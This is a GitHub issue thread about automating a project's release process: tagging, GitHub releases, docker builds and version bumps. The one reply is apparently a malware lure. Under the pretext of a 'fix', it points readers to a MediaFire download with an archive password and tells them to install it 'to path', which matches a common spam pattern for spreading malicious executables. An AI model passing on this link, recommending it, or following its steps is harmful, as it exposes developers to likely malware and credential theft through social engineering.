### ISSUE TITLE
Automate the release process

### ISSUE THREAD

**Issue by jeffrpowell** [jeffrpowell/listaway#4]
https://chatgpt.com/share/7d31385c-0ac8-416c-b4fc-e292a4091ada
* Generate a git tag
* Creating a release in GitHub
* Generate a docker container
* Update the latest release version number in the README.md and web/package.json files (do I really need that latter one?).

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
